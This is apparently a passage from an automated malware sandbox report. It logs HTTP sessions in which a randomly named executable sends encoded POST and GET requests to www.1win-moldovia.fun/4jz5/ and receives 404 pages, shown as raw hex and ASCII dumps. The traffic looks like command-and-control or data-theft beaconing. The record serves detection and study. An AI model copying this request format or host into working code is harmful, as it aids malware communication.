              Sep 6, 2024 09:07:17.619585991 CEST1236INData Raw: 58 c0 09 a6 d5 8a 2b ea 07 85 4f 06 45 9a d3 9b 77 d7 57 a0 9d c6 3f 12 f1 63 28 7f 11 5a bf 8e 88 48 c9 4d 21 6e de bd ff 45 e5 64 2e 38 8c d3 09 e2 ac c0 da 9a 36 a4 ba be c2 35 e3 14 5e 62 6d dd 41 e7 b4 11 36 21 67 a1 0c 4b 6b 75 a4 b5 36 4a
              Data Ascii: X+OEwW?c(ZHM!nEd.865^bmA6!gKku6Js#sFooJKv8PK'hXQfh][8E$ppDe|E67Bb>v;srav|W<z-"sbmZjIs&yM}bh.\7y@+Bu
              Sep 6, 2024 09:07:17.619613886 CEST1236INData Raw: cc c3 ec f5 d5 65 c8 f3 40 d9 4b 01 58 6a db 93 b1 5a 57 03 e5 03 90 0b 3a 10 5a 52 16 50 10 78 1f ef 7a 0c 08 a3 b9 e1 00 d1 fe f8 c3 29 c9 05 80 0c 8c c5 39 35 90 7c 2c 1c 5a 11 e3 12 60 03 51 62 e5 31 4d c5 c1 26 01 bc 78 f9 ba d0 b9 ff 1a 8c
              Data Ascii: e@KXjZW:ZRPxz)95|,Z`Qb1M&xEBNaR'i;!MbaKA).QIL13EDIaCt:#3\rfbLb7Z8D;@B[MP]_9^{41Xb{|rA=JU_
              Sep 6, 2024 09:07:17.619630098 CEST1236INData Raw: 69 f3 58 50 f3 1c 1e b5 56 34 49 c8 33 48 75 73 be fe 1c e5 0a 20 3d 84 72 69 97 95 41 9b f6 f3 03 c0 45 78 1e 3a 30 74 83 4e e9 8a 39 1b dc 5d 1b f5 3b e5 f4 e6 e2 7a 60 6b 08 88 ee 2e b7 ff 96 41 ba b6 ed dd 51 1a ce b6 41 7a db 9e 9b 00 bd e3
              Data Ascii: iXPV4I3Hus =riAEx:0tN9];z`k.AQAz=]GkB'n[J|G)r^/|LDk])6_5.a+c2%pw_o>+S`+<g@RVwp^@_YlH2OrP
              Sep 6, 2024 09:07:17.619647980 CEST976INData Raw: eb a3 bd 1a ac 5e b5 db a9 e1 a9 78 83 a6 58 af f6 2e 97 b6 eb dc c7 f1 69 ed 28 ff 5f 6e 8f 3a e3 bb 68 db d1 c6 76 48 a0 a9 2d b4 11 34 b8 08 0f e8 ee d2 c9 fb 59 cf 9f c6 c9 05 6f c6 1c f9 0a 38 dc 81 a8 fa f1 7d 99 ef 4d ae 3c a5 03 32 18 2b
              Data Ascii: ^xX.i(_n:hvH-4Yo8}M<2+*k3PQO}50h:Y+|t(:-y@-m'#BNNFg;Rtj?>{q/^~Opk5LnpW@:LF}k#}O


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              34192.168.2.649763188.114.96.3805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:07:19.497196913 CEST830OUTPOST /4jz5/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.1win-moldovia.fun
              Content-Length: 231
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.1win-moldovia.fun
              Referer: http://www.1win-moldovia.fun/4jz5/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 6d 37 36 49 54 67 33 52 4a 6d 72 4b 63 38 55 54 42 6a 36 48 54 4d 67 4a 49 63 75 4d 30 53 34 7a 4a 45 62 49 76 4d 70 34 35 42 4d 38 75 79 46 71 70 38 2f 44 58 71 65 61 66 77 66 48 41 51 67 58 4e 73 79 6d 6b 47 59 30 33 72 62 55 39 46 41 42 65 49 57 73 43 6a 48 6e 53 30 70 39 54 44 55 50 6e 2f 71 57 75 55 61 74 4a 38 46 39 68 56 4e 52 48 74 46 78 65 30 44 66 57 57 68 44 71 5a 56 2b 4c 67 50 62 6a 59 39 4b 78 78 63 57 57 48 64 68 49 54 46 64 6d 69 4f 44 69 76 73 4e 43 39 73 57 66 56 6c 2f 63 30 65 43 30 69 50 64 6a 44 4c 58 41 73 7a 54 79 59 2f 77 38 2b 46 62 73 62 76 59 59 52 37 32 53 6f 63 6f 78 36 61 31 31 58 78 55 36 75 46 6a 61 44 70 70 58 78 5a 52 42 49 4e 34 6a 51 3d 3d
              Data Ascii: FR=m76ITg3RJmrKc8UTBj6HTMgJIcuM0S4zJEbIvMp45BM8uyFqp8/DXqeafwfHAQgXNsymkGY03rbU9FABeIWsCjHnS0p9TDUPn/qWuUatJ8F9hVNRHtFxe0DfWWhDqZV+LgPbjY9KxxcWWHdhITFdmiODivsNC9sWfVl/c0eC0iPdjDLXAszTyY/w8+FbsbvYYR72Socox6a11XxU6uFjaDppXxZRBIN4jQ==
              Sep 6, 2024 09:07:20.122401953 CEST1236INHTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:07:20 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mvouXfpGVf%2FAPyScpXF1FVa%2F8%2BP1Q93%2B7napzLthYxsP2cYS%2BPUI3757UPgKDmaXAw5RV%2FdgjSduHNI5WMTtHfjse6e%2BoJDUocmdGWBQXaKUsfgZX3d6PZPFvwDqY0%2FEftO0r%2FC7k8s%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8bec9f195faa19a1-EWR
              Content-Encoding: gzip
              alt-svc: h3=":443"; ma=86400
              Data Raw: 31 62 34 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 5c 5b 6f 23 37 96 7e 0f 90 ff c0 11 b0 c8 2e b6 aa ac 2a 49 96 d4 b1 bd 70 dc c9 a4 07 ee c4 9b ee 49 76 b0 18 18 14 8b 92 d8 cd 22 6b 58 a4 da ed bd bc f8 7d de b3 fd 96 97 7d 9b 3f d1 7e f0 cf 5a 9c 43 d6 45 17 5f da e9 0e 06 0b a4 63 a9 2e a7 58 e4 b9 7c e7 9c 8f 3a f8 97 72 59 7e fe d9 92 d3 9c 9b 7f fc e2 db 97 2f cf f6 d2 24 25 c3 fe 90 7c a7 2d f9 46 3b 95 7f f1 4f 5f 7e fe d9 bf 1c 7d fe d9 e7 9f 1d fc ee e9 f7 27 2f ff 74 f6 35 59 da 42 1e 7d fe d9 01 fc 25 92 aa c5 61 cf e8 f8 f9 d3 de d1 e7 9f 11 42 0e 40 a4 ff 08 df 0a 6e 29 59 5a 5b c6 fc 2f 4e ac 0e 7b 27 5a 59 ae 6c fc f2 6d c9 7b 84 f9 6f 87 3d cb 2f ec 1e 88 fc 92 b0 25 35 15 b7 87 7f 7c f9 4d 3c e9 6d 88 52 b4 e0 87 bd 95 e0 6f 4a 6d 6c 47 c0 1b 91 db e5 61 ce 57 82 f1 18 bf 44 44 28 61 05 95 71 c5 a8 e4 87 69 47 96 15 56 f2 a3 f4 27 a1 c8 7f 92 63 c6 78 45 6f de 09 52 09 cb 63 27 89 9e 0b 26 a8 24 54 92 52 52 3b d7 a6 e0 82 e4 9c bc d2 cc 19 41 d2 9f 9e 7d 37 e3 f6 60 cf cb 69 c4 [TRUNCATED]
              Data Ascii: 1b46\[o#7~.*IpIv"kX}}?~ZCE_c.X|:rY~/$%|-F;O_~}'/t5YB}%aB@n)YZ[/N{'ZYlm{o=/%5|M<mRoJmlGaWDD(aqiGV'cxEoRc'&$TRR;A}7`iJ^a4i8=4|~IUz!9-E0]%ftUi#B6=VU/'Ts{xUj.b<\5boNWp0) {p`jeJM+fDii40F2wZQIn~2+k/KaS/De5<bWo]aV?y.f8q;\CP+Vzo"-f';6oML:b6
              Sep 6, 2024 09:07:20.122430086 CEST1236INData Raw: ca 70 d7 65 70 65 b5 5a 10 b0 f5 af f4 c5 61 af 4f fa 64 3a ee 93 e1 74 d0 23 17 85 7c 52 95 94 71 34 93 8a 9b 15 c7 83 aa f2 56 f2 64 6f ef cd 9b 37 c9 9b 41 a2 cd 62 2f eb f7 fb 7b d5 6a d1 ab c7 f9 62 b5 38 d5 0b 7d 5e 85 bf f6 4f 2f 67 67 f7
              Data Ascii: pepeZaOd:t#|Rq4Vdo7Ab/{jb8}^O/ggd8=mkgPR$ay6EY q2dgddi?Igx`dqi6HQ:1|'8K,`~2[6HxLI<Hef82edM
              Sep 6, 2024 09:07:20.122441053 CEST448INData Raw: 4f 92 c9 10 90 fd 7e 5c ff b7 8c 07 19 c3 e3 a4 1f a7 fb 24 9c 24 e9 fe 2a 1d 0e bf 4d f7 6f 39 39 c8 58 9f e0 19 38 48 ea ff 96 e9 70 08 37 ee 3e 39 c8 98 17 46 52 4c 30 e0 60 9c ee ff 98 4d 26 70 e3 ce 93 2b 18 e0 ae 91 5f 7e ac 60 77 8f 5e bc
              Data Ascii: O~\$$*Mo99X8Hp7>9FRL0`M&p+_~`w^k'>wwN>'dVsH4o:[o+h|]&R,/K\[::jq/W$Pp=*R-8$WP-J@RR#97BD-fq}
              Sep 6, 2024 09:07:20.122453928 CEST1236INData Raw: 27 2a 21 df d1 95 58 c0 09 a6 d5 8a 2b ea 07 85 4f 06 45 9a d3 9b 77 d7 57 a0 9d c6 3f 12 f1 63 28 7f 11 5a bf 8e 88 48 c9 4d 21 6e de bd ff 45 e5 64 2e 38 8c d3 09 e2 ac c0 da 9a 36 a4 ba be c2 35 e3 14 5e 62 6d dd 41 e7 b4 11 36 21 67 a1 0c 4b
              Data Ascii: '*!X+OEwW?c(ZHM!nEd.865^bmA6!gKku6Js#sFooJKv8PK'hXQfh][8E$ppDe|E67Bb>v;srav|W<z-"sbmZjIs&yM}bh.\7y@+
              Sep 6, 2024 09:07:20.122464895 CEST1236INData Raw: a4 0d 6a 06 a0 3f cc c3 ec f5 d5 65 c8 f3 40 d9 4b 01 58 6a db 93 b1 5a 57 03 e5 03 90 0b 3a 10 5a 52 16 50 10 78 1f ef 7a 0c 08 a3 b9 e1 00 d1 fe f8 c3 29 c9 05 80 0c 8c c5 39 35 90 7c 2c 1c 5a 11 e3 12 60 03 51 62 e5 31 4d c5 c1 26 01 bc 78 f9
              Data Ascii: j?e@KXjZW:ZRPxz)95|,Z`Qb1M&xEBNaR'i;!MbaKA).QIL13EDIaCt:#3\rfbLb7Z8D;@B[MP]_9^{41Xb{|rA
              Sep 6, 2024 09:07:20.122479916 CEST1236INData Raw: 83 fb f0 c5 c0 23 69 f3 58 50 f3 1c 1e b5 56 34 49 c8 33 48 75 73 be fe 1c e5 0a 20 3d 84 72 69 97 95 41 9b f6 f3 03 c0 45 78 1e 3a 30 74 83 4e e9 8a 39 1b dc 5d 1b f5 3b e5 f4 e6 e2 7a 60 6b 08 88 ee 2e b7 ff 96 41 ba b6 ed dd 51 1a ce b6 41 7a
              Data Ascii: #iXPV4I3Hus =riAEx:0tN9];z`k.AQAz=]GkB'n[J|G)r^/|LDk])6_5.a+c2%pw_o>+S`+<g@RVwp^@_YlH2
              Sep 6, 2024 09:07:20.122493029 CEST977INData Raw: 2a 75 d8 fa b7 ae eb a3 bd 1a ac 5e b5 db a9 e1 a9 78 83 a6 58 af f6 2e 97 b6 eb dc c7 f1 69 ed 28 ff 5f 6e 8f 3a e3 bb 68 db d1 c6 76 48 a0 a9 2d b4 11 34 b8 08 0f e8 ee d2 c9 fb 59 cf 9f c6 c9 05 6f c6 1c f9 0a 38 dc 81 a8 fa f1 7d 99 ef 4d ae
              Data Ascii: *u^xX.i(_n:hvH-4Yo8}M<2+*k3PQO}50h:Y+|t(:-y@-m'#BNNFg;Rtj?>{q/^~Opk5LnpW@:LF}k#


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              35192.168.2.649764188.114.96.3805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:07:22.038928986 CEST1843OUTPOST /4jz5/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.1win-moldovia.fun
              Content-Length: 1243
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.1win-moldovia.fun
              Referer: http://www.1win-moldovia.fun/4jz5/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 6d 37 36 49 54 67 33 52 4a 6d 72 4b 63 38 55 54 42 6a 36 48 54 4d 67 4a 49 63 75 4d 30 53 34 7a 4a 45 62 49 76 4d 70 34 35 42 45 38 75 41 4e 71 70 66 48 44 55 71 65 61 42 41 66 45 41 51 68 4e 4e 73 71 63 6b 47 64 4a 33 70 6a 55 38 6d 34 42 59 35 57 73 58 54 48 6e 64 55 70 47 5a 6a 56 62 6e 2f 61 61 75 51 32 74 4a 38 46 39 68 57 56 52 44 35 70 78 53 55 44 51 66 32 68 50 75 5a 56 57 4c 67 6d 6d 6a 59 34 78 78 67 38 57 57 6e 74 68 4e 67 68 64 37 53 4f 4e 75 50 73 56 43 39 67 33 66 52 4e 4a 63 30 71 73 30 67 54 64 67 6c 36 6d 66 49 75 4c 6d 4b 6e 47 6e 4a 42 77 69 72 76 63 64 42 6d 4f 5a 34 51 36 76 71 75 64 78 53 74 32 75 49 41 51 4e 54 42 51 65 6c 45 6e 49 59 45 4d 2f 46 69 72 4f 6b 46 6d 56 48 32 6e 45 68 6e 76 64 4c 48 59 39 74 6b 38 56 2f 41 64 43 62 2b 30 4f 58 6b 64 63 77 67 72 75 51 47 53 63 66 52 4d 47 54 4a 49 32 4f 4b 75 6b 35 52 76 2b 35 67 37 79 51 45 62 61 5a 6e 73 75 59 2f 2f 7a 4f 51 42 52 4f 68 4b 35 38 43 39 66 49 5a 2f 74 32 7a 31 4d 64 39 46 7a 45 37 39 43 62 49 49 54 4a 2b [TRUNCATED]
              Data Ascii: FR=m76ITg3RJmrKc8UTBj6HTMgJIcuM0S4zJEbIvMp45BE8uANqpfHDUqeaBAfEAQhNNsqckGdJ3pjU8m4BY5WsXTHndUpGZjVbn/aauQ2tJ8F9hWVRD5pxSUDQf2hPuZVWLgmmjY4xxg8WWnthNghd7SONuPsVC9g3fRNJc0qs0gTdgl6mfIuLmKnGnJBwirvcdBmOZ4Q6vqudxSt2uIAQNTBQelEnIYEM/FirOkFmVH2nEhnvdLHY9tk8V/AdCb+0OXkdcwgruQGScfRMGTJI2OKuk5Rv+5g7yQEbaZnsuY//zOQBROhK58C9fIZ/t2z1Md9FzE79CbIITJ+FIVBEi6kG5/ILN4A2tGz6Sa2Y5KrvfiO/icINlJvhmoVlAmnT6I9xFZbf8tuohwzRLOz73ZYCwT0KueByLJeL+S6tje6UpM6rZLpTSLMj5Rr9+l4ju4UQR29TOD167XU4FPX8Ug/Dn5d/Fj1Jyf4T8PBNKaeU0mwrKhzI9/O2RaTMKycK7dBfqDg5+g+AyYfRq6iEUxgYo6bfotF/qvpKz95WBK0lk3gVPJf9JGxeGe+y5PJsKN2dz55QGMBnVF2zR45j5CvglTuHVMRPguwVpqHwo/KBJcfpVAGf9x0ZjytfQ/r25x62PjYtPmwJyODCXQc03g8N2lGs1YzxdT5ToIbgfmZVR8IsvR9SkgYbLoPpxkd5ILXO2CeWz1VK9AHJBT9aMBUW8Y90l2sq3rnEiRGZfAFLhb7I/ED3XZh409bLrmXCY6cvpEZLupFFErmcB3OGmLdqWq2k7kOFCXxA6Td9xVTmjrn2e9Y5AcvHUwu/Wtrpu3aQ7vE9G9kY7CTYP52hpMDep2OsbkwK82y7mH3UhQnjd6fD3g0huASx1b5IdaseQ3v5L11+HzpPKvTAhgKvqg/RMis/gMCSB8O4SRlGyofJXGoR/HuRbEe98+3D1Hc97IIuos/hcBykkQT/CHF41W5KTd4IHNKn+/uY59A3HhVe1rpi2 [TRUNCATED]
              Sep 6, 2024 09:07:22.713160038 CEST1236INHTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:07:22 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A%2BWmiFkkzBgAT%2FaSovLL9gC72YXX0XVhHcddRNV655VuUm%2FTFsVSbo8HCw6AtafwWDHxz2r3nm0E8XKRpOkZ6J8V049Ko%2BZYQd%2FzrUfpap01B3KGwas3GGFNgxHke%2FvMF0ol80c5Cmo%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8bec9f294d8a18fa-EWR
              Content-Encoding: gzip
              alt-svc: h3=":443"; ma=86400
              Data Raw: 31 62 34 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 5c 5b 6f 23 37 96 7e 0f 90 ff c0 11 b0 c8 2e b6 aa ac 2a 49 96 d4 b1 bd 70 dc c9 a4 07 ee c4 9b ee 49 76 b0 18 18 14 8b 92 d8 cd 22 6b 58 a4 da ed bd bc f8 7d de b3 fd 96 97 7d 9b 3f d1 7e f0 cf 5a 9c 43 d6 45 17 5f da e9 0e 06 0b a4 63 a9 2e a7 58 e4 b9 7c e7 9c 8f 3a f8 97 72 59 7e fe d9 92 d3 9c 9b 7f fc e2 db 97 2f cf f6 d2 24 25 c3 fe 90 7c a7 2d f9 46 3b 95 7f f1 4f 5f 7e fe d9 bf 1c 7d fe d9 e7 9f 1d fc ee e9 f7 27 2f ff 74 f6 35 59 da 42 1e 7d fe d9 01 fc 25 92 aa c5 61 cf e8 f8 f9 d3 de d1 e7 9f 11 42 0e 40 a4 ff 08 df 0a 6e 29 59 5a 5b c6 fc 2f 4e ac 0e 7b 27 5a 59 ae 6c fc f2 6d c9 7b 84 f9 6f 87 3d cb 2f ec 1e 88 fc 92 b0 25 35 15 b7 87 7f 7c f9 4d 3c e9 6d 88 52 b4 e0 87 bd 95 e0 6f 4a 6d 6c 47 c0 1b 91 db e5 61 ce 57 82 f1 18 bf 44 44 28 61 05 95 71 c5 a8 e4 87 69 47 96 15 56 f2 a3 f4 27 a1 c8 7f 92 63 c6 78 45 6f de 09 52 09 cb 63 27 89 9e 0b 26 a8 24 54 92 52 52 3b d7 a6 e0 82 e4 9c bc d2 cc 19 41 d2 9f 9e 7d 37 e3 f6 60 cf cb 69 c4 [TRUNCATED]
              Data Ascii: 1b46\[o#7~.*IpIv"kX}}?~ZCE_c.X|:rY~/$%|-F;O_~}'/t5YB}%aB@n)YZ[/N{'ZYlm{o=/%5|M<mRoJmlGaWDD(aqiGV'cxEoRc'&$TRR;A}7`iJ^a4i8=4|~IUz!9-E0]%ftUi#B6=VU/'Ts{xUj.b<\5boNWp0) {p`jeJM+fDii40F2wZQIn~2+k/KaS/De5<bWo]aV?y.f8q;\CP+Vzo"-f';6oML:b6pepe
              Sep 6, 2024 09:07:22.713180065 CEST1236INData Raw: b5 5a 10 b0 f5 af f4 c5 61 af 4f fa 64 3a ee 93 e1 74 d0 23 17 85 7c 52 95 94 71 34 93 8a 9b 15 c7 83 aa f2 56 f2 64 6f ef cd 9b 37 c9 9b 41 a2 cd 62 2f eb f7 fb 7b d5 6a d1 ab c7 f9 62 b5 38 d5 0b 7d 5e 85 bf f6 4f 2f 67 67 f7 8c 06 06 64 38 b3
              Data Ascii: ZaOd:t#|Rq4Vdo7Ab/{jb8}^O/ggd8=mkgPR$ay6EY q2dgddi?Igx`dqi6HQ:1|'8K,`~2[6HxLI<Hef82edMi
              Sep 6, 2024 09:07:22.713191986 CEST1236INData Raw: 7e 5c ff b7 8c 07 19 c3 e3 a4 1f a7 fb 24 9c 24 e9 fe 2a 1d 0e bf 4d f7 6f 39 39 c8 58 9f e0 19 38 48 ea ff 96 e9 70 08 37 ee 3e 39 c8 98 17 46 52 4c 30 e0 60 9c ee ff 98 4d 26 70 e3 ce 93 2b 18 e0 ae 91 5f 7e ac 60 77 8f 5e bc ff 6b 27 f5 be d5
              Data Ascii: ~\$$*Mo99X8Hp7>9FRL0`M&p+_~`w^k'>wwN>'dVsH4o:[o+h|]&R,/K\[::jq/W$Pp=*R-8$WP-J@RR#97BD-fq}b
              Sep 6, 2024 09:07:22.713212013 CEST672INData Raw: f9 ee 2b f8 df b7 a7 11 79 e9 a1 d1 f3 e7 c7 db 60 e8 a1 d2 01 a2 c5 f5 4d 4f c8 d3 ef 5f 1e 67 11 39 d5 a7 11 39 79 f1 e4 f7 df 47 e4 85 a5 86 9c 18 3a b7 24 6b 9e 23 f9 03 67 a0 1b c4 9f 90 50 42 88 c8 a9 63 af df fe 01 f0 dc 8b 92 f3 9c 50 95
              Data Ascii: +y`MO_g99yG:$k#gPBcP""?h[oux}V3]vn+GgJLD>K6*y'bpE6usHRVUc1nWP7SsVq/5fK@lKG8M%(x
              Sep 6, 2024 09:07:22.713228941 CEST1236INData Raw: c2 7b ef e6 ad 7c 1e c8 13 72 d2 cc 41 93 3d 4a be 55 5f da 4e 02 fc 3b e8 92 1b 4e 2f 61 bc c1 77 4a be 00 56 98 b6 50 77 c1 37 80 6a 49 ab 9b 5d 1a 51 cd 1b 6a 54 a4 b2 1b 70 16 57 4c b4 c7 5a 65 dd d6 10 01 49 87 88 88 e1 b9 30 dc 3f 04 d6 d3
              Data Ascii: {|rA=JU_N;N/awJVPw7jI]QjTpWLZeI0?f+taY0#1b@{@~r}U?iAHU*-"{\Kn {or$q`58P(*r]zr4@72aXl~),~}X^8-
              Sep 6, 2024 09:07:22.713241100 CEST1236INData Raw: 03 e6 c4 fb 5f c4 ad 59 6c bb 48 1d 32 8e 4f e6 9e 72 50 85 15 37 8d 77 69 f2 62 e5 9a aa 3c f4 e7 91 a2 a0 67 52 2c d0 9b f3 90 b5 c2 76 d7 82 aa 3c b0 d8 7c 7c e5 21 5e ae c4 65 28 c4 86 36 1f 20 94 82 86 c6 7c db 8d b7 dc 14 5c 01 ab 6d 81 f4
              Data Ascii: _YlH2OrP7wib<gR,v<||!^e(6 |\m_,8?&s+^)fF.6jA| YR,}.D%4U.&"n/U,{!+E{Rf
              Sep 6, 2024 09:07:22.713254929 CEST747INData Raw: 8b 4c 46 fb 7d 82 d5 6b 23 a4 8c c8 19 7d cb b9 89 c8 4f 7c 06 4f 7c 1b 91 e7 8e 2d bf e2 d6 c2 d1 63 d8 0c 7d 46 df fe 3a 06 df 6f d7 78 f7 46 e4 db 41 9e ce 5a eb 22 74 af f1 c5 8d a8 e0 9a df fd c6 ac b3 b6 56 f0 69 cc fa b8 e5 40 fb df ec 5b
              Data Ascii: LF}k#}O|O|-c}F:oxFAZ"tVi@[3J*ZS@!/!UA-Zy+s(`:1X 3c.nOBM|Bw@NT )2x%Cbr>Lz#P:1u(TR+:SDjFP%AY?u/G


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              36192.168.2.649765188.114.96.3805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:07:24.586982965 CEST535OUTGET /4jz5/?yXghy=KTox&FR=r5SoQQ/DZBXKP6QrNwGfWrJNBN6t0nUZU0GWsfQ0/kE9qy9dgr2+a8OrPCjBDi0TM6SD7wE/mt75vEwxSaGxWB73VkpxOVd4no3A+iHSW7NgpDpMEtZ9JlGQE1ss8/xFDzn1hco= HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.1win-moldovia.fun
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:07:25.218151093 CEST1236INHTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:07:25 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5KbTlssbaJYxbcs9Tn0Iz6Wk5E9w0Vai3MHVa6WtctGFDFBoVVoboC4kPLx45IsNOl9kU4T4g2Zu95mXZyJ69iD7%2B0eAeio4S4i87fZVHg6RtZ1pn5yX%2Fe7oknV1hOvb1NwOJ%2F3dN0A%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8bec9f391b305e86-EWR
              alt-svc: h3=":443"; ma=86400
              Data Raw: 33 66 62 39 0d 0a 3c 3f 70 68 70 0d 0a 68 65 61 64 65 72 28 27 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 27 29 3b 0d 0a 3f 3e 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 6f 2d 4d 44 22 3e 0d 0a 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 31 57 69 6e 20 7c 20 41 63 63 65 73 61 c8 9b 69 20 73 69 74 65 2d 75 6c 20 6f 66 69 63 69 61 6c 20 61 6c 20 70 6c 61 74 66 6f 72 6d 65 69 20 64 65 20 6a 6f 63 75 72 69 20 31 57 49 4e 62 65 74 3c 2f 74 69 74 6c 65 [TRUNCATED]
              Data Ascii: 3fb9<?phpheader('HTTP/1.1 404 Not Found');?><!DOCTYPE html><html lang="ro-MD"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>1Win | Accesai site-ul oficial al platformei de jocuri 1WINbet</title> <link rel="preconnect" href="https://fonts.googleapis.com/"> <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin=""> <link href="./css/css2" rel="stylesheet"> <link href="./css/style.css" rel="stylesheet" type="text/css"> <link rel="icon" href="./img/favicon.png" type="
              Sep 6, 2024 09:07:25.218178034 CEST1236INData Raw: 69 6d 61 67 65 2f 70 6e 67 22 3e 0d 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 3e 0d
              Data Ascii: image/png"> <link rel="shortcut icon" href="favicon.png" type="image/png"> <meta name="description" content="Mirror funcional i actualizat al 1WIN pentru accesul la site-ul oficial i nregistrare."> </head> <body>
              Sep 6, 2024 09:07:25.218189955 CEST448INData Raw: 2d 31 34 2e 31 2c 32 34 2d 32 37 2e 36 6c 31 32 2e 33 2d 36 37 2e 39 63 32 2e 39 2d 31 35 2e 35 2c 35 2e 33 2d 32 33 2c 31 30 2e 36 2d 32 38 2e 37 63 38 2e 31 2d 39 2e 32 2c 32 34 2e 34 2d 31 33 2e 34 2c 33 35 2e 37 2d 34 2e 32 63 36 2e 37 2c 35
              Data Ascii: -14.1,24-27.6l12.3-67.9c2.9-15.5,5.3-23,10.6-28.7c8.1-9.2,24.4-13.4,35.7-4.2c6.7,5.6,9.2,15.2,7.4,28.7l-12.3,73.5c-2.7,16.3,4.2,26.2,17.7,26.2h30.4c17.3,0,20.8-13.4,23.3-27.6l17.8-92.1C822.7,202.9,811,170.1,771.7,164.4z" class="SvgLogo_st2_Thl
              Sep 6, 2024 09:07:25.218200922 CEST1236INData Raw: 2d 33 30 2e 37 63 2d 31 34 2e 38 2c 30 2d 32 30 2e 32 2d 31 31 2d 31 37 2e 33 2d 32 35 2e 35 4c 35 33 32 2e 32 2c 31 38 38 63 32 2e 35 2d 31 35 2e 32 2c 39 2e 32 2d 32 34 2e 34 2c 32 38 2d 32 34 2e 34 68 32 33 2e 33 63 31 39 2e 38 2c 30 2c 32 34
